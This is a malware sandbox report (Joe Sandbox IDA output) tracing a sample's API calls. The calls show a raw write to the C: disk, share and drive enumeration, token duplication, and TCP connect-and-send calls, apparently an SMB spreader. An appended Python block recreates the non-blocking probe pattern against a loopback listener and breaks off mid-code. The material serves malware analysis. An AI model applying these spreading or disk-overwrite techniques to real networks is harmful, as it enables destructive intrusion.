                                                • API String ID: 2259129056-1542503432
                                                • Opcode ID: 8f524277c965de87380477d176299f460be97e1192ae3e8064efd7c5621aad97
                                                • Instruction ID: 6ba64602f1cfa914d29a25061753ba888f1fd21da4b49f52d1f5cf0cbe2d88dc
                                                • Opcode Fuzzy Hash: 8f524277c965de87380477d176299f460be97e1192ae3e8064efd7c5621aad97
                                                • Instruction Fuzzy Hash: 93319EB2DA0279AFCB109FA5CC84ABEFBBCEF8D304B154456EA01E6141D7789654CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(\\.\C:,40000000,00000003,00000000,00000003,00000000,00000000,00000000), ref: 02E58D79
                                                • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 02E58D9A
                                                • LocalAlloc.KERNEL32(00000000,?), ref: 02E58DAD
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 02E58DC0
                                                • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 02E58DD2
                                                • LocalFree.KERNEL32(00000000), ref: 02E58DD9
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02E58DE0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Local$AllocChangeCloseControlCreateDeviceFindFreeNotificationPointerWrite
                                                • String ID: \\.\C:
                                                • API String ID: 1700486895-259948872
                                                • Opcode ID: 8539a0e637bcb0db9fcb6065dc1b95577719987bcaff1f3645476d70a6b95612
                                                • Instruction ID: 5799c8ffb5fa905c79919c92f1d015bd4659368f382ff0c082693381b17a7046
                                                • Opcode Fuzzy Hash: 8539a0e637bcb0db9fcb6065dc1b95577719987bcaff1f3645476d70a6b95612
                                                • Instruction Fuzzy Hash: 7611A7715D13347FD221AA62AC8CFBB7E9CEF8B668F445518FD05D1040DB208590C7B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,02E56FFB,00000001,?,00000000), ref: 02E572B9
                                                  • Part of subcall function 02E571D6: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E571E7
                                                  • Part of subcall function 02E571D6: LeaveCriticalSection.KERNEL32(?,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E5723E
                                                • GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,02E56FFB,00000001,?,00000000), ref: 02E572EA
                                                • HeapAlloc.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E572F3
                                                • GetProcessHeap.KERNEL32(00000008,?,?,02E56FFB,00000001,?,00000000), ref: 02E5730B
                                                • HeapAlloc.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5730E
                                                • memcpy.MSVCRT ref: 02E5733F
                                                • GetProcessHeap.KERNEL32(00000000,?,?,02E56FFB,00000001,?,00000000), ref: 02E57358
                                                • HeapFree.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5735B
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,02E56FFB,00000001,?,00000000), ref: 02E57373
                                                • HeapReAlloc.KERNEL32(00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5737A
                                                • LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,02E56FFB,00000001,?,00000000), ref: 02E5739E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                • String ID:
                                                • API String ID: 1369668251-0
                                                • Opcode ID: 8d14871464339fc84eb7cc8b7acc6fd36f6e645c10dd216debf1d726aa18ee1a
                                                • Instruction ID: bac68b9a3fc4be848e67b77ae0c368e18962f5cef351879605484edeb2a7468a
                                                • Opcode Fuzzy Hash: 8d14871464339fc84eb7cc8b7acc6fd36f6e645c10dd216debf1d726aa18ee1a
                                                • Instruction Fuzzy Hash: 7D315A71990724EFCB219FAAC944E6AB7F5FF4C314B108918ED8A87650DB31E961CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 02E57A3C
                                                • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 02E57A50
                                                • memset.MSVCRT ref: 02E57A6B
                                                • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 02E57A7F
                                                • GlobalFree.KERNEL32(00000000), ref: 02E57B18
                                                • WNetCloseEnum.MPR(0000FFFF), ref: 02E57B21
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                • String ID:
                                                • API String ID: 4070278229-0
                                                • Opcode ID: 301adfc2faf6131055354a0c91c6b86382832c3cb84267602cb636a59bc845ba
                                                • Instruction ID: 97f11700b9ca7ac3b5fe5cedd3b87482a9ea3778d87067ffda8ff33ee21ee64a
                                                • Opcode Fuzzy Hash: 301adfc2faf6131055354a0c91c6b86382832c3cb84267602cb636a59bc845ba
                                                • Instruction Fuzzy Hash: B4319C71850129AFDB209F95CC84EAEFBBAEF48308B50D169F915A7151E3309BA0CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • htonl.WS2_32 ref: 02E58E25
                                                • htonl.WS2_32 ref: 02E58E32
                                                • inet_ntoa.WS2_32(00000000), ref: 02E58E35
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                  • Part of subcall function 02E56916: GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                  • Part of subcall function 02E56916: HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 02E58E53
                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 02E58E5A
                                                • LocalFree.KERNEL32(?), ref: 02E58E70
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                • String ID:
                                                • API String ID: 3470587009-0
                                                • Opcode ID: 096c5efb8054e96b62438231dd04875471e04ae5cd3ca373f0fe55c33ac26e75
                                                • Instruction ID: 98dad1f1cc5af1652272f870e593dae801f44249c7a608410fb987c159ae6d79
                                                • Opcode Fuzzy Hash: 096c5efb8054e96b62438231dd04875471e04ae5cd3ca373f0fe55c33ac26e75
                                                • Instruction Fuzzy Hash: 4E0112B5990724AFCB04AFB6DDC885F7BBCEF483547509855F946E3101DB74A9808B70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLogicalDrives.KERNELBASE ref: 02E51EF7
                                                • GetDriveTypeW.KERNELBASE(?,?,?,?,02E5808B), ref: 02E51F2E
                                                • LocalAlloc.KERNEL32(00000040,00000020,?,?,?,02E5808B), ref: 02E51F3D
                                                • CreateThread.KERNELBASE(00000000,00000000,02E51E51,00000000,00000000,00000000), ref: 02E51F66
                                                Strings
                                                • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 02E51F4A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                • String ID: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y
                                                • API String ID: 2320387513-881851080
                                                • Opcode ID: 0fb27049705a99194a8b7f3c718502c61dec90e86b1a7ba5a327fdd0dc847dfb
                                                • Instruction ID: 140b6e43e8880342b5167ce4303336029e3f8fb2240df55bf229ed49b1f9bf29
                                                • Opcode Fuzzy Hash: 0fb27049705a99194a8b7f3c718502c61dec90e86b1a7ba5a327fdd0dc847dfb
                                                • Instruction Fuzzy Hash: FA0104356A0324BFD704DBA6DC09FAF7BB8EF48764F00485AE609DB181D7709980C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetComputerNameExW.KERNEL32(00000004,?,?,02CD6160,02CD6160), ref: 02E57C4F
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00008E7F,02CD6160,00000000,00000000), ref: 02E57C71
                                                • Sleep.KERNEL32(0002BF20,02CD6160,02CD6160), ref: 02E57C9D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ComputerCreateNameSleepThread
                                                • String ID: 127.0.0.1$localhost
                                                • API String ID: 2701298213-2339935011
                                                • Opcode ID: f1b56eb7e83e9360eee39651fc19ffd5299c60c79f12f9f83239825908a9d277
                                                • Instruction ID: db56ae155d54b543ab68ed808745ce88bac3cc19039a62fef1e11bd29dfec4a2
                                                • Opcode Fuzzy Hash: f1b56eb7e83e9360eee39651fc19ffd5299c60c79f12f9f83239825908a9d277
                                                • Instruction Fuzzy Hash: 6C01A7B18D4238BAE220B7779C8CEBBBA7CDB45B44F50A114BE05E2040DA605C64C9B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 02E59FA7
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02E5A125,00000000), ref: 02E59FAE
                                                • DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000002,00000002,02E5A125), ref: 02E59FC9
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A05B
                                                • CloseHandle.KERNEL32(02E5A125,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A068
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                • String ID:
                                                • API String ID: 3602278934-0
                                                • Opcode ID: df8c3043d25d9d06f163ab310662e16ccb35e5e7dc863185c1be5cbd5924aa29
                                                • Instruction ID: c06a835a177bb4ec0004367705756e2c4929c640928d714a54bfdfdb8a8cf5aa
                                                • Opcode Fuzzy Hash: df8c3043d25d9d06f163ab310662e16ccb35e5e7dc863185c1be5cbd5924aa29
                                                • Instruction Fuzzy Hash: 64216271DA0228BADB20ABB69C45EDFB7BDAF84704F50D425F901B2140DB309A41DB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(?,80100000,00000003,00000000,00000003,00000000,00000000,00000000,00000000), ref: 02E5125B
                                                • GetLastError.KERNEL32 ref: 02E51268
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: 8e3a9c2eda776309afaf2857b05f993c07ae529200851d2a0fe9a546918d6985
                                                • Instruction ID: 5f83ddb58bcaba82a86fccf633bcff8ef2f4b3139019b55f49dcdecd77e5d832
                                                • Opcode Fuzzy Hash: 8e3a9c2eda776309afaf2857b05f993c07ae529200851d2a0fe9a546918d6985
                                                • Instruction Fuzzy Hash: 111186359E0235BBD7215A65DC04BAA7A6CEF467A4F108524FD0DDA180D7348A54DBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02E56737
                                                • ioctlsocket.WS2_32(00000000,8004667E,000001BD), ref: 02E5674C
                                                • htons.WS2_32(00058778), ref: 02E56784
                                                • inet_addr.WS2_32(02CE5020), ref: 02E56791
                                                • connect.WS2_32(00000000,?,?), ref: 02E567A1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: connecthtonsinet_addrioctlsocketsocket
                                                • String ID:
                                                • API String ID: 2155135532-0
                                                • Opcode ID: eb198959b93a0577a4b27f1d350834f0c90abd134bd8b2a4fcf8e04664fa3c2d
                                                • Instruction ID: ff68d1cf3d5b40d671a1e4b2d95c81ffae26a013ad31e86c58a59d45058fe7f2
                                                • Opcode Fuzzy Hash: eb198959b93a0577a4b27f1d350834f0c90abd134bd8b2a4fcf8e04664fa3c2d
                                                • Instruction Fuzzy Hash: F0110E3A890228BFEB109FB5CC09AEFBF39EF45320F400656FA1196190C33085A1C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,00000000,00000000), ref: 02E596F4
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 02E59735
                                                • inet_addr.WS2_32(?), ref: 02E59742
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharFileFindMultiNamePathWideinet_addr
                                                • String ID: C:\Windows\dllcm.dat
                                                • API String ID: 2501698972-1561905061
                                                • Opcode ID: 66702ffce0155f49d1e206db5c50b7b3b2fe498f7d3961c1efd12f1f3130e957
                                                • Instruction ID: 17bd5b98fa5470bd71b2709a6cb044b81c01ccc1a4809926247838d9a2082d9d
                                                • Opcode Fuzzy Hash: 66702ffce0155f49d1e206db5c50b7b3b2fe498f7d3961c1efd12f1f3130e957
                                                • Instruction Fuzzy Hash: 0A21DE35980229EBDF209F65DC09FDA77BCEB44368F048992F905D6081E7B0A684CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 02E593E1
                                                • LoadLibraryA.KERNELBASE(?), ref: 02E5940B
                                                • GetProcAddress.KERNELBASE(00000000,02E50000), ref: 02E5944E
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02E5948E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                • String ID:
                                                • API String ID: 3300690313-0
                                                • Opcode ID: 6cb8027783ac9c47a34d24090d252a5554393f4ccdb78b8c07b3ab78f2574138
                                                • Instruction ID: e4ee17d172b96c9c69af29dbdc7d3733a3a0a7509759755aa13c32821f4b601a
                                                • Opcode Fuzzy Hash: 6cb8027783ac9c47a34d24090d252a5554393f4ccdb78b8c07b3ab78f2574138
                                                • Instruction Fuzzy Hash: DC413C71990229DFCF10CF99D884BAEB7F9FF04359F1494A9D805A7242D370E990CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E5A0E2
                                                • HeapFree.KERNEL32(00000000), ref: 02E5A0EB
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E5A0F0
                                                • HeapFree.KERNEL32(00000000), ref: 02E5A0F3
                                                  • Part of subcall function 02E59E05: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000003,00000003,?,00000000,?,?), ref: 02E59E8A
                                                  • Part of subcall function 02E59E05: HeapFree.KERNEL32(00000000), ref: 02E59E91
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: d2f2420698127494b76ddc91e68902af500d45e19221b1792bd45c599edede3d
                                                • Instruction ID: 8459266d12d62900fa6e0ff05ec8d26d063cb173d052a410e36623ceb04d4215
                                                • Opcode Fuzzy Hash: d2f2420698127494b76ddc91e68902af500d45e19221b1792bd45c599edede3d
                                                • Instruction Fuzzy Hash: 20018475AB0234ABDB10AA76DD44F6B76EDAF48298F049425FE05D7240DB70E9418AF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 02E568AE
                                                • select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 02E568E4
                                                • send.WS2_32(?,000001BD,02CE5020,00000000), ref: 02E568FC
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memsetselectsend
                                                • String ID:
                                                • API String ID: 1046435934-0
                                                • Opcode ID: 644ebce27dcdbf3baaebb46d82a38c4ab2893fe8b3bfd34544237b46e8663b74
                                                • Instruction ID: 5361238f38f2e507f7b5d9d094fd38a1ef9411963c54c55e05a7425d181138c3
                                                • Opcode Fuzzy Hash: 644ebce27dcdbf3baaebb46d82a38c4ab2893fe8b3bfd34544237b46e8663b74
                                                • Instruction Fuzzy Hash: 0301B171851128BBDB208FA4CC48ADFBBBCEF05324F508266B819E5080D7B086E8CFD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%
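The two function entries above, socket/ioctlsocket/htons/inet_addr/connect followed by memset/select/send, are the standard non-blocking TCP connect sequence that a network spreader uses to probe many hosts with a bounded wait per host. The Python block below is an added illustration of that sequence, not code from the sample, from Joe Sandbox or from any NotPetya analysis; it reproduces the pattern against a loopback listener so it can be run offline. The numeric constants are taken from the recorded call arguments (AF_INET = 2, SOCK_STREAM = 1, IPPROTO_TCP = 6, FIONBIO = 0x8004667E). Treating the repeated 0x1BD argument as TCP port 445 (SMB) is an assumption, and the payload is a constructed placeholder, not the sample's SMB request.

```python
import select
import socket
import threading

# Constants as recorded in the sandbox call arguments above.
AF_INET = 2            # socket.WS2_32(00000002, ...)
SOCK_STREAM = 1        # socket.WS2_32(..., 00000001, ...)
IPPROTO_TCP = 6        # socket.WS2_32(..., ..., 00000006)
FIONBIO = 0x8004667E   # ioctlsocket.WS2_32(s, 8004667E, ...): put the socket in non-blocking mode
SMB_PORT = 0x1BD       # 445; assumption: the 000001BD argument is the target port

# Constructed placeholder payload: a 4-byte NetBIOS session header followed by the
# SMB magic. It is NOT the sample's request and means nothing to a real server.
PLACEHOLDER_PAYLOAD = b"\x00\x00\x00\x04" + b"\xffSMB"


def nonblocking_connect_and_send(host, port, payload, timeout=2.0):
    """socket -> ioctlsocket(FIONBIO) -> connect -> select -> send, with a bounded wait.

    Returns True when the TCP handshake completed within `timeout` seconds and the
    payload was handed to the kernel; False on refusal, unreachable host or timeout.
    """
    s = socket.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
    try:
        s.setblocking(False)            # Winsock equivalent: ioctlsocket(s, FIONBIO, &enable)
        try:
            s.connect((host, port))
        except BlockingIOError:
            pass                        # WSAEWOULDBLOCK / EINPROGRESS: handshake still in flight
        except OSError:
            return False                # some platforms report refusal synchronously
        # A non-blocking connect signals completion by the socket becoming writable;
        # the select() timeout is what keeps a sweep of many hosts from hanging on a silent one.
        _, writable, _ = select.select([], [s], [], timeout)
        if not writable:
            return False                # timed out: host down or filtered
        if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) != 0:
            return False                # ECONNREFUSED / EHOSTUNREACH is delivered via SO_ERROR
        s.settimeout(timeout)
        s.sendall(payload)
        return True
    finally:
        s.close()


def start_capture_listener():
    """Start a loopback TCP listener that accepts one connection and records what it receives.

    Returns (port, received, thread); `received` is filled with the bytes read.
    """
    srv = socket.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
    srv.bind(("127.0.0.1", 0))          # ephemeral port, nothing fixed is required
    srv.listen(1)
    srv.settimeout(5.0)
    port = srv.getsockname()[1]
    received = []

    def serve():
        try:
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(2.0)
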